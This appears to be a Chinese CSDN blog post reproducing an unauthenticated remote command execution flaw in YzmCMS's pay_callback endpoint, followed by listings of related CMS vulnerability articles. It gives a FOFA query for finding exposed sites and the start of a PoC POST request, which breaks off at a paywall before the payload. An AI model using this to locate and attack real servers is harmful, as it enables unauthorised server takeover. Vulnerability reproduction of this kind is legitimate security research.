YzmCMS pay_callback 远程命令执行漏洞复现

已于 2024-04-30 23:19:48 修改
阅读量1.8k 收藏
点赞数 2
分类专栏: 漏洞复现v1 文章标签: 安全 web安全
于 2024-04-30 23:19:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/138359360
版权
本文详细介绍了YzmCMS的pay_callback接口存在的远程命令执行漏洞,描述了漏洞概述、复现环境及过程,并给出了修复建议。攻击者可以未经验证地利用此漏洞执行任意系统命令,影响服务器安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统,YzmCMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。

0x02 漏洞概述

YzmCMS /pay/index/pay_callback.html接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,写入后门文件,最终可获取服务器权限。

0x03 复现环境

FOFA:app="yzmcms"

0x04 漏洞复现

PoC

POST /pay/index/pay_callback.html HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded

out_trade_no[0]=eq&ou
了解本专栏 订阅专栏 解锁全文 超级会员免费看
漏洞复现YzmCMS-远程命令执行-pay_callback
知黑而守白
06-19 768
YZMCMS是一款轻量级、高效且开源的内容管理系统,它基于PHP+Mysql架构,采用自主研发的YZMPHP框架和MVC模式进行开发。该系统具有卓越的跨平台性能,能够稳定运行在Linux、Windows、MacOSX、Solaris等多种操作系统上。YzmCMS pay_callback 接口处存在远程命令执行漏洞,恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。
漏洞复现】I Doc View在线文档预览任意文件读取 1day
失心少年
12-14 696
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!I Doc View在线文档预览是一款在线文档预览系统,可以实现文档的预览及文档协作编辑功能。其存在代码执行漏洞,使得攻击者可以通过利用这个接口,触发服务器下载并解析恶意文件,从而导致远程命令执行漏洞
houyusen#poc#YzmCMS V5.4 后台getshell(二)1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
YzmCMS跨站脚本漏洞(CVE-2020-22394)复现
玄道的网安博客
11-28 5005
简介 YzmCMS基于 PHP 的轻量级开源内容管理系统。 漏洞概述 YzmCMS v5.5版本存在跨站脚本漏洞,该漏洞源于编辑器中的member contribution function包含一个跨站点脚本(XSS)漏洞。 影响版本 YzmCMS v5.5 环境搭建 到官网下载源码 https://www.yzmcms.com/ 好像官网最近访问不了了,放个百度网盘的 https://pan.baidu.com/s/1y8_4FrGlUUrV0-LaGWJhWA 安装完成后 .
YZMCMS V5.3后台 SSRF
weixin_30340819的博客
07-15 859
当改变命运的时刻降临,犹豫就会败北。 前言 此前在测试过程中遇到过此CMS,久攻不下,于是便尝试代码审计,不得不说这套CMS还是挺安全的,读起来也简单,也适合初学代码审计的同学去阅读,不过漏洞真的不多,本人绞尽脑汁终于算是审计出一个弱鸡漏洞。                    漏洞分析 漏洞位于 application\collection\controller\colle...
【代码审计】YzmCMS_PHP_v3.6 代码执行漏洞分析
12-03 3816

  
 0x00 环境准备
 YzmCMS官网:http://www.yzmcms.com/
 程序源码下载:http://pan.baidu.com/s/1pKA4u99
 测试网站首页:
  
 0x01 代码分析
 1、文件位置: /application/admin/controller/sql.cla...
cms[172.168.20.114] 漏洞复现
小同的博客
04-01 496
1.信息收集 简单信息收集IP:172.168.20.114 端口:8080 中间件:apache shiro 2.具体步骤 1.抓包工具:Burp suite 发现漏洞:反序列化漏洞 2.使用apache-shior漏洞探测工具扫描 第一步:爆破密钥 第二步:查看是否有回显 第三步:进行注入 反序列化工具地址:https://github.com/j1anFen/shiro_attack 下载步骤 第四步:使用刚才选择的连接工具:我这里是中国...
【代码审计】YzmCMS_PHP_v3.6 任意文件删除漏洞分析
12-03 1419
  0x00 环境准备 YzmCMS官网:http://www.yzmcms.com/ 程序源码下载:http://pan.baidu.com/s/1pKA4u99 测试网站首页:   0x01 代码分析 1、文件位置: /application/member/controller/member.class.php 第118-132行中: public functio...
YzmCMS 7.0任意函数调用RCE 漏洞研究分析
shelter1234567的博客
05-07 3184
YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统,YzmCMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。YzmCMS某些接口调用了 db_pdo类的where方法 导致了远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,写入后门文件,最终可获取服务器权限。
YzmCMS信息管理系统 6.0
04-30
YzmCMS是一款轻量级信息管理系统,基于PHP+Mysql架构的,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,前台采用DIV+CSS设计,遵循WEB标准,兼容各种浏览器,后台界面设计简洁明了,完全采用PHP5面向对象设计,功能简单易具有良好的用户体验,稳定性好、扩展性及安全性强。YzmCMS 6.0 更新日志:2021-01-261.升级至YZMPHP框架2.5版本;2.精简优化系统文件,程序体积更小;3.模型字段新增多附件上传类型;4.系统新增锁屏功能;5.模板调用支持强制模板风格;6.新增获取会员中心消息数量及内容标题是否重复接口;7.系统分页新增跳转到指定页;8.修复会员邮箱可重复的bug;9.修复普通管理员系统管理无权限的问题;10.修复特殊情况下批量添加栏目失败的问题;11.测试发送邮件优化;12.系统函数库优化及其他细节改进;13.修复已知安全漏洞
YzmCMS轻量级开源CMS v5.3.zip
07-06
YzmCMS v5.3更新日志 1.多图上传新增远程地址! 2.修复MySQL5.7及以上SQL不兼容问题; 3.修复采集模块出错问题; 4.修复积分操作类不严谨导致的漏洞; 5.修复自定义伪静态后缀分页出错问题; 6.后台会员统计优化; 7.修复图片浏览插件安全问题; 8.新增附件上传类型; 9.系统函数库新增多个函数; 10.系统缓存文件命名优化; 本次更新优化内容包括但不限于以上所列举的项! YzmCMS特点 源码简洁 因为YzmCMS是由一人独自开发完成,所以系统所有源码风格全部统一,源码非常干净、无冗余代码! 开发灵活 YzmCMS系统采用MVC框架式开发,增加了程序的维护性、可扩展性,并采用模块化开发设计,使二次开发变得简单、容易。 开源 YzmCMS系统是100%开源的PHP程序,保证系统的代码更健壮和更安全。 轻量级 YzmCMS系统在保持强大的功能前提下,整体压缩包仅不足5MB,比同类CMS至少缩小一倍,是您可以快速了解和研究它! YzmCMS前台页面 YzmCMS后台管理 后台路径:域名/admin/ 用户名与密码:yzmcms(安装时可设置) 后台页面 相关阅读 同类推荐:CMS
YzmCMS轻量级开源CMS v5.4
11-07
YzmCMS是一款轻量级开源内容管理系统,它采用OOP(面向对象)方式自主开发的框架。基于PHP+Mysql架构,并采用MVC框架式开发的一款高效开源的内容管理系统,可运行在Linux、Windows、MacOSX、Solaris等各种平台上。它可以让您不需要任何专业技术轻松搭建您需要的网站,操作简单,很容易上手,快捷方便的后台操作让您10分钟就会建立自己的爱站。在同类产品的比较中,YzmCMS更是凸显出了体积轻巧、功能强大、源码简洁、系统安全等特点,无论你是做企业网站、新闻网站、个人博客、门户网站、行业网站、电子商城等,它都能完全胜任,而且还提供了非常方便的二次开发体系,是一款全能型的建站系统!安装方式:访问根目录下install.php,根据提示系统将自动安装成功;YzmCMS特点:源码简洁因为YzmCMS是由一人独自开发完成,所以系统所有源码风格全部统一,源码非常干净、无冗余代码!开发灵活YzmCMS系统采用MVC框架式开发,增加了程序的维护性、可扩展性,并采用模块化开发设计,使二次开发变得简单、容易。开源YzmCMS系统是100%开源的PHP程序,保证系统的代码更健壮和更安全
漏洞复现YzmCMS pay_callback.html存在远程命令执行漏洞
失心少年
05-02 735
YzmCMS /pay_callback.html接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统命令。
网安之web攻防第四十天笔记
B_l_a_nk的博客
04-06 639
1、CSRF-审计-复现测试&同源策略 2、SSRF-审计-功能追踪&函数搜索
YZMCMS V5.3后台SSRF漏洞以及代码审计详解
最新发布
2201_75489354的博客
11-18 626
作用是将$articleurl交给get_content处理,也就是交给crul_exec()处理,此时 $article 的值就是 crul_exec() 获取到的url内容。又将$content交给get_sub_content处理后重新赋值给$content。$url_start和$url_end,区域开始和区域结束不能为设置的值。$url_contain和$url_except依次判断是否满足要求。再发现$url交给get_content去处理并付给concent。
最新系统漏洞--YzmCMS服务器端请求伪造漏洞
weixin_48555088的博客
10-21 1442
最新系统漏洞2021年10月21日 受影响系统: YzmCMS YzmCMS 5.8 描述: CVE(CAN) ID: CVE-2020-35970 YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统。 YzmCMS 5.8版本的后台收集管理功能存在服务器端请求伪造漏洞。攻击者可利用该漏洞任意读取文件。 <**> 建议: 厂商补丁: YzmCMS 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: https://github.com/yzmcms/yzmcms/
某CMS漏洞总结
include_voidmain的博客
08-01 5072
某CMS漏洞总结
常见CMS漏洞(WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin)
2301_76631050的博客
08-04 2165
利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。路径: E:\phpstudy_pro\Extensions\MySQL5.7.26\data\。猜测web路径: E:\phpstudy_pro\WWW。不要用\,如里要用\\(转义)
Web安全 | EmpireCMS漏洞常见漏洞分析及复现
Javachichi的博客
03-05 2725
本文将对EmpireCMS(帝国cms)的漏洞进行分析及复现
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值